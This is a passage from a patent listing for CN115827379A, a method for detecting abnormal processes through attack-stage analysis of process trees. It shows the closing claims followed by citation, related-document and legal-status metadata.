the detection module is further configured to perform advanced anomaly detection on the target process tree according to the attack stage corresponding to each abnormal process node in the target process tree, so as to obtain an anomaly detection result for the target process tree.
14. A computer device comprising a memory and a processor, the memory storing a computer program, characterized in that the processor, when executing the computer program, implements the steps of the method of any of claims 1 to 12.
15. A computer-readable storage medium, in which a computer program is stored which, when being executed by a processor, carries out the steps of the method according to any one of claims 1 to 12.
16. A computer program product comprising a computer program, characterized in that the computer program realizes the steps of the method of any one of claims 1 to 12 when executed by a processor.
CN202211476713.6A 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium Pending CN115827379A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202211476713.6A CN115827379A (en) 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202211476713.6A CN115827379A (en) 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium

Publications (1)

Publication Number Publication Date
CN115827379A true CN115827379A (en) 2023-03-21

Family

ID=85530750

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202211476713.6A Pending CN115827379A (en) 2022-11-23 2022-11-23 Abnormal process detection method, device, equipment and medium

Country Status (1)

Country Link
CN (1) CN115827379A (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116938605A (en) * 2023-09-18 2023-10-24 腾讯科技(深圳)有限公司 Network attack protection method and device, electronic equipment and readable storage medium

Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112114995A (en) * 2020-09-29 2020-12-22 平安普惠企业管理有限公司 Process-based terminal anomaly analysis method, device, equipment and storage medium
US20220053335A1 (en) * 2021-01-29 2022-02-17 Beijing Baidu Netcom Science Technology Co., Ltd. Method for detecting an abnormal device, device and storage medium
CN114679315A (en) * 2022-03-25 2022-06-28 中国工商银行股份有限公司 Attack detection method, apparatus, computer device, storage medium, and program product
CN114925366A (en) * 2022-05-31 2022-08-19 苏州浪潮智能科技有限公司 Method, system, terminal and storage medium for virus detection and blocking

Patent Citations (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN112114995A (en) * 2020-09-29 2020-12-22 平安普惠企业管理有限公司 Process-based terminal anomaly analysis method, device, equipment and storage medium
US20220053335A1 (en) * 2021-01-29 2022-02-17 Beijing Baidu Netcom Science Technology Co., Ltd. Method for detecting an abnormal device, device and storage medium
CN114679315A (en) * 2022-03-25 2022-06-28 中国工商银行股份有限公司 Attack detection method, apparatus, computer device, storage medium, and program product
CN114925366A (en) * 2022-05-31 2022-08-19 苏州浪潮智能科技有限公司 Method, system, terminal and storage medium for virus detection and blocking

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116938605A (en) * 2023-09-18 2023-10-24 腾讯科技(深圳)有限公司 Network attack protection method and device, electronic equipment and readable storage medium
CN116938605B (en) * 2023-09-18 2024-01-05 腾讯科技(深圳)有限公司 Network attack protection method and device, electronic equipment and readable storage medium

Similar Documents

Publication Publication Date Title
US11025674B2 (en) Cybersecurity profiling and rating using active and passive external reconnaissance
US11601475B2 (en) Rating organization cybersecurity using active and passive external reconnaissance
US11184401B2 (en) AI-driven defensive cybersecurity strategy analysis and recommendation system
US20220014560A1 (en) Correlating network event anomalies using active and passive external reconnaissance to identify attack information
US20220078210A1 (en) System and method for collaborative cybersecurity defensive strategy analysis utilizing virtual network spaces
US11032323B2 (en) Parametric analysis of integrated operational technology systems and information technology systems
CN111786950B (en) Network security monitoring method, device, equipment and medium based on situation awareness
US9661003B2 (en) System and method for forensic cyber adversary profiling, attribution and attack identification
US10706144B1 (en) Cyber defense with graph theoretical approach
US20210360032A1 (en) Cybersecurity risk analysis and anomaly detection using active and passive external reconnaissance
US10282542B2 (en) Information processing apparatus, information processing method, and computer readable medium
US12041091B2 (en) System and methods for automated internet- scale web application vulnerability scanning and enhanced security profiling
US20210281609A1 (en) Rating organization cybersecurity using probe-based network reconnaissance techniques
CN113496033B (en) Access behavior recognition method and device and storage medium
CN110188538B (en) Method and device for detecting data by adopting sandbox cluster
WO2021216163A2 (en) Ai-driven defensive cybersecurity strategy analysis and recommendation system
US20230283641A1 (en) Dynamic cybersecurity scoring using traffic fingerprinting and risk score improvement
CN115766258B (en) Multi-stage attack trend prediction method, equipment and storage medium based on causal relationship graph
CN115827379A (en) Abnormal process detection method, device, equipment and medium
US11893005B2 (en) Anomaly detection based on an event tree
CN113704569A (en) Information processing method and device and electronic equipment
WO2023163842A1 (en) Thumbprinting security incidents via graph embeddings
CN115643044A (en) Data processing method, device, server and storage medium
CN113553370A (en) Abnormality detection method, abnormality detection device, electronic device, and readable storage medium
CN116155519A (en) Threat alert information processing method, threat alert information processing device, computer equipment and storage medium

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination